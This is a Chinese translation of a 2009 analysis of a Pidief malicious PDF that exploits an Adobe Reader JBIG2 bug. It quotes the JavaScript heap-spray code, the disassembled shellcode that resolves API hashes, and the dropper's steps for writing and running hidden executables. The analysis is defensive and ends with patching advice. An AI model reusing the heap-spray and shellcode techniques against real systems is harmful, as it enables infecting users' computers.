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原作:Peter Kleissner
我想给大家分享下2009年3月对一个Adobe pdf漏洞的分析结果,该漏洞由于JBIG2压缩中的BUG导致执行任意Win32代码。该漏洞目前(2009年3月3日)已经仅在内部被修补,但Adobe有望在3月11日才发布更新版本。自2007年以来的所有Adobe阅读器(Adobe Reader 7.0和更高版本都受影响),恶意PDF文件利用此漏洞的成功率非常低,所以传播的不是很广泛。
•Exploit Code,包含在PDF文件的Stream中并经过加密的可执行文件(malware)
PDF漏洞文件开发主要有三个部分:JavaScript代码、Shellcode、Exploit Code。这三部分在漏洞利用开发过程中都同等重要。
Pidief是一个知名度很高、传播十分广泛的病毒家族(本文分析的也是),在其历史上它利用各种Adobe Pdf漏洞来执行恶意程序(malware).下面分析的就是Pidief家族中鲜活的实例。尽情享受吧!
2 0 obj
<</S /JavaScript
/JS (\040\012\012\040\040\040\040\040\040\040\040\146\165\156\143\164\151\157\156\040\160
JS脚本相当大,解码后长度为42792字节(其中主要部分是Shellcode)。在演示解码后的Java代码之前,我想简单介绍一下PDF文件中的JavaScript代码是如何执行的。Adobe使用自己的内部引擎,大家可能想到是IE浏览器,但Adobe并没有使用IE浏览器引擎。JavaScript是由不同的动作(triggers)执行。根据一份来自Adobe的德文文档所述,一共有7个动作用来执行JavaScript,这里使用的是第一个动作,Open Document。所以这样也带来一个很重要的限制,PDF中执行JavaScript是依赖动作的。下面是动作Open Document时注册要执行的JavaScript代码:
3 0 obj
<</Type /Catalog
/Outlines 4 0 R
/Pages 5 0 R
/OpenAction 2 0 R
OpenAction定义了执行的对象obj 2 0,也就是包含了上面经过Oct编码的JavaScript代码的对象。
function printInfo(){
console.println("Viewer language: " + app.language);
console.println("Viewer version: " + app.viewerVersion);
console.println("Viewer Type: " + app.viewerType);
console.println("Viewer Variatio: " + app.viewerVariation);
console.println("Dumping all data objects in the document.");
if ( this.external )
console.println("viewing from a browser.");
console.println("viewing in the Acrobat application.");
// Create a 1MB string of NOP instructions followed by shellcode:
// malloc header string length NOP slide shellcode NULL terminator
// 32 bytes 4 bytes x bytes y bytes 2 bytes
while (pointers.length <= 0x100000/2)
pointers += pointers;
pointers = pointers.substring(0, 0x100000/2 - 32/2 - 4/2 - pointers1.length - 2/2 );
while (nop.length <= 0x100000/2)
nop += nop;
nop = nop.substring(0, 0x100000/2 - 32/2 - 4/2 - jmp.length - 2/2);
// while (nop1.length <= 0x100000/2)
// nop1 += nop1;
//shelcode <1M
// nop1 = nop1.substring(0, 0x100000/2 - 32/2 - 4/2 - shellcode.length - 2/2 );
像往常一样,PDF漏洞文件一般都是利用软件(Adobe Reader)的BUG(exploiting)而开发的。一个常见的技术如“缓冲区溢出”,尝试溢出在栈上的缓冲区并并覆盖函数返回跳转地址到指定数据。这里使用的正是这种技术,并利用JBIG2压缩的漏洞实现。JavaScript代码开辟了200MB内存并使用NOP指令(空操作,汇编指令)和Shellcode填充。然后JBIG2压缩漏洞将导致程序跳转到200MB内存的某个位置去执行。这就是为什么有这么多的NOP指令,正因入口点位置不能确定,所以NOP指令将被执行,最后执行到Shellcode。以下代码用来开辟200MB内存:
var x = new Array();
// Fill 200MB of memory with copies of the NOP slide and shellcode
for (i = 0; i < 150; i++) {
x[i] = nop+shellcode;
// x[i++] = nop1+shellcode;
for (; i < 201; i++) {
x[i] = pointers + pointers1;
这里非常有趣的是为了在不同的版本下利用该漏洞,针对Adobe Reader 9 和Adobe Reader 7.0(以及更高版本)有不同的代码进行处理:
JavaScript代码将Shellcode填充到内存,以便在Adobe Reader漏洞触发时执行。Shellcode本身是有效的Win32代码,存储并被escaped在JavaScript代码中。这里我们禁用JavaScript引擎,并进入阅读器窗口。在前四个字节,Shellcode在最开始包含了"JBIA"缩写字样并紧跟着4句垃圾指令代码。让它们记录并返回调用Shellcode的目标:从PDF文件中释放并执行两个可执行文件。让我们看看初始化代码:
; [junk code] - "JBIA"
00000000 4A dec edx
00000001 42 inc edx
00000002 49 dec ecx
00000003 41 inc ecx
; create data on stack (284 bytes)
00000004 81EC20010000 sub esp,288
0000000A 8BFC mov edi,esp
0000000C 83C704 add edi,4 ; edi is a pointer to the new allocated data
; store the hashes of Windows API functions for later usage
0000000F C7073274910C mov dword [edi],0xc917432 ; LoadLibraryA
00000015 C747048E130AAC mov dword [edi+0x4],0xac0a138e
; GetFileSize
0000001C C7470839E27D83 mov dword [edi+0x8],0x837de239
; GetTempPathA
00000023 C7470C8FF21861 mov dword [edi+0xc],0x6118f28f
; TerminateProcess
0000002A C747109332E494 mov dword [edi+0x10],0x94e43293
; CreateFileA
00000031 C74714A932E494 mov dword [edi+0x14],0x94e432a9
; CreateFileW
00000038 C7471843BEACDB mov dword [edi+0x18],0xdbacbe43
; SetFilePointer
0000003F C7471CB2360F13 mov dword [edi+0x1c],0x130f36b2
; ReadFile
00000046 C74720C48D1F74 mov dword [edi+0x20],0x741f8dc4
; WriteFile
0000004D C74724512FA201 mov dword [edi+0x24],0x1a22f51
; WinExec
00000054 C7472857660DFF mov dword [edi+0x28],0xff0d6657
; CloseHandle
0000005B C7472C9B878BE5 mov dword [edi+0x2c],0xe58b879b
; GetCommandLineA
00000062 C74730EDAFFFB4 mov dword [edi+0x30],0xb4ffafed
; GetModuleFileNameA
; call the code following this instruction
00000069 E997020000 jmp dword Execute_Function
00000305 E864FDFFFF call Execute_Shellcode
; just for obfuscation, this will never return
可以看到函数的hash值被存放在堆栈中,然后是一个用来迷惑大家的Call(译者:正如上面所说"this will never return")。Jump指令跳转到调用它下面代码的Call。所以你可以去掉jump和call指令,效果还是一样的。Execute_Shellcode过程一开始代码就开始解析hash值并获取对应函数的地址:
; Arguments:
; edi = pointer to the data/code stored on stack
0000006E 64A130000000 mov eax,[fs:0x30]
; get a pointer to the Process Environment Block
00000074 8B400C mov eax,[eax+12]
; get a pointer to PEB_LDR_DATA structure
00000077 8B701C mov esi,[eax+28]
; -> PEB_LDR_DATA.InInitializationOrderModuleList.LDR_DATA_TABLE_ENTRY
0000007A AD lodsd
; double linked list, Forward link, to LDR_DATA_TABLE_ENTRY / LDR_MODULE structure (UNDOCUMENTED)
0000007B 8B6808 mov ebp,[eax+8]
; DllBase (Module Base Address) (UNDOCUMENTED)
; resolve the 13 function hashes
0000007E 8BF7 mov esi,edi
; esi points to the first hash to resolve
00000080 6A0D push byte 13
; loop 13 times
00000082 59 pop ecx
; ecx is counter
00000083 E838020000 call dword ResolveImportsByHashes
00000088 E2F9 loop Resolve_Hashes
; resolves function hashes
; ebp = Module Address
; edi = pointer to hash to resolve and exchange with functions address
; store register contents
000002C0 51 push ecx
000002C1 56 push esi
000002C2 8B753C mov esi,[ebp+0x3C]
; -> PE Header (skip DOS Header)
000002C5 8B742E78 mov esi,[esi+ebp+0x78]
; Export Table Virtual Address
000002C9 03F5 add esi,ebp
; (absolute address)
000002CB 56 push esi
; store address of Export Directory Table
000002CC 8B7620 mov esi,[esi+0x20]
; Name Pointer RVA (list of all functions)
000002CF 03F5 add esi,ebp
; (absolute address)
000002D1 33C9 xor ecx,ecx
000002D3 49 dec ecx
; ecx is name counter
000002D4 41 inc ecx
; -> next function name
000002D5 AD lodsd
; get the address of the function name
000002D6 03C5 add eax,ebp
; (absolute address)
000002D8 33DB xor ebx,ebx
; reset next hash to generate
000002DA 0FBE10 movsx edx,byte [eax]
; load next character
000002DD 3AD6 cmp dl,dh
; zero terminator?
000002DF 7408 jz Generated_Hash
000002E1 C1CB07 ror ebx,7
; => this is hash generating algorithm hash += char >> 7
000002E4 03DA add ebx,edx
; (add the shifted character to generating hash)
000002E6 40 inc eax
; -> next character
000002E7 EBF1 jmp short Generate_Hash_of_Function_Name
000002E9 3B1F cmp ebx,[edi]
; matches the input hash with generated one?
000002EB 75E7 jnz Function_Name_loop
; if not compare against next function
000002ED 5E pop esi
; restore address of Export Directory Table
000002EE 8B5E24 mov ebx,[esi+0x24]
; Ordinal Table
000002F1 03DD add ebx,ebp
; (absolute address)
000002F3 668B0C4B mov cx,[ebx+ecx*2]
; look up the function in the Ordinal Table to get the ordinal number
000002F7 8B5E1C mov ebx,[esi+0x1c]
; Export Address Table
000002FA 03DD add ebx,ebp
; (absolute address)
000002FC 8B048B mov eax,[ebx+ecx*4]
; -> look up the Address of the function (ordinal number in EAT)
000002FF 03C5 add eax,ebp
; (absolute address)
00000301 AB stosd
; overwrite the input hash with the address
; restore register contents
00000302 5E pop esi
00000303 59 pop ecx
00000304 C3 ret
ResolveImportsByHashes函数非常典型,几乎是每一个漏洞利用文件中必有的一部分。将其与Sinowal进行对比。像其它解析函数地址的函数一样,这个函数使用ror 7来生成hash值(非常典型),其余的代码没有什么特别之处,仅仅是标准的API调用。与对Sinowal的分析一样,我不想花太多时间在这些代码上。下面是API调用的列表:
Kernel32!GetFileSize(FileHandle +4, NULL);
done in a loop, in order to get the size of every file and compare it with fixed PDF file size
to get the file handle of the pdf file
Kernel32!GetTempPathA(Stack Buffer, 256 bytes);
returns temp path, where the 2 executables will be stored to
appending "\SVCHOST.EXE" to the temp path
Kernel32!CreateFileA("C:\Windows\Temp\SVCHOST.EXE", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
creates the first file in the temp path
Kernel32!SetFilePointer(PDF File Handle, File Position = where the string is, NULL, FILE_BEGIN);
sets file pointer in PDF file to a special configuration block
Kernel32!ReadFile(PDF File Handle, Buffer, 48 Bytes, &NumberOfBytesRead, NULL);
reads the configuration block (30h bytes)
Kernel32!SetFilePointer(PDF File Handle, File Position, NULL, FILE_BEGIN);
sets the file pointer to the position of the to-extract file in the PDF file, received from the configuration block
Kernel32!ReadFile(PDF File Handle, Buffer, 1024 Bytes, &NumberOfBytesRead, NULL);
Kernel32!WriteFile(PDF File Handle, Read File Buffer, 1024 Bytes, &NumberOfBytesWritten, NULL);
both done in a loop to read the whole first file
directly after read the file (buffer) will be decrypted with xor 97h
Kernel32!CloseHandle(Created File);
Kernel32!WinExec(Created File Name, 0);
the malware will be executed
strcat(Temp Path, "\temp.exe");
second files name is temp.exe
Kernel32!CreateFileA(Second File Name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
also created in the temp directory
Kernel32!SetFilePointer(PDF File Handle, File Position = somewhere in the file, NULL, FILE_BEGIN);
at this time the file position is hard wired coded
Kernel32!ReadFile(PDF File Handle, Buffer, 1024 Bytes, &NumberOfBytesRead, NULL);
Kernel32!WriteFile(PDF File Handle, Read File Buffer, 1024 Bytes, &NumberOfBytesWritten, NULL);
again both done in a loop to read the whole second file
directly after read the file (buffer) will be decrypted with at this time xor A0h
Kernel32!SetFilePointer(Created File Handle, File Position = 9000h, NULL, FILE_BEGIN);
the file pointer of the second file will be moved to that position
Kernel32!WriteFile(PDF File Handle, previously read configuration buffer, 40 Bytes, &NumberOfBytesWritten, NULL);
and the configuration block written
Kernel32!CloseHandle(Created File);
Kernel32!WinExec(Created Second File Name, 0);
also this file will be executed
Kernel32!CloseHandle(Created File);
** programming error with this call making the process crashing
Kernel32!TerminateProcess(Current Process, Exit Code = 0);
will never be executed but should smoothly terminate Adobe Reader
...and that's it!
00029FD0 41 41 49 20 41 4D 4F 53 20 31 31 2D 30 32 2D 30 AAI AMOS 11-02-0
00029FE0 39 2E 70 64 66 00 00 74 00 78 78 78 78 78 78 78 9.pdf..t.xxxxxxx
00029FF0 78 78 78 78 78 78 78 78 C8 B0 04 00 FC 47 03 00 xxxxxxxxè°..üG..
紧挨着最后一个DWORD位置0004B0C8是目标文件的大小值(307400 bytes)。最后一个DWORD即000347FC是该文件在PDF文件中的位置,但0x2a000和0xb000是在PDF打开时获取的。
•地址6Eh:直接访问PEB(Process Environment Block)结构,PEB_LDR_DATA;它们在不同的操作系统版本中Window XP,Server 2003以及Vista中并不固定
•地址C0h:只给文件名称分配了256个字节,但Windows定义的MAX_PATH为260字节,(4 ("C:\", 0) + 256 (file name))。这就意味着如果PDF文件名称长度大于260时,可能导致程序崩溃
•地址2B7h:替换GetCurrentProcess而使用GetFileSize函数调用,实际上这会导致Adobe Reader崩溃
所有安装有Adobe Reader 7.0或者更高版本的Windows XP系统在2009年3月11日之前都受此漏洞影响。因为3月11日Adobe公司将发布更新Adobe Reader版本。此外,是用Adobe Reader时最好禁用JavaScript(默认是开启的)。在下面的链接中Adobe公司也给出了应对该漏洞的紧急措施。
我不能很确定Vista是否也受到该漏洞的影响,但至少我们知道不同的操作系统其PEB(Process Environment Block)和PEB_LDR_DATA结构可能不尽相同。而且也没有看到Vista系统下恶意程序做什么以及如何兼容等信息,之后我们再作分析。
PDF Exploits非常不错,但是也很难发现。作为病毒作者,你必须相当熟悉Adobe Reader才能发现漏洞,但是如果发现的话,这个就值数千欧元(在市场上有超过1W欧元的)。作为普通的用户一定要记得及时更新Adobe Reader并且开启自动更新功能。 |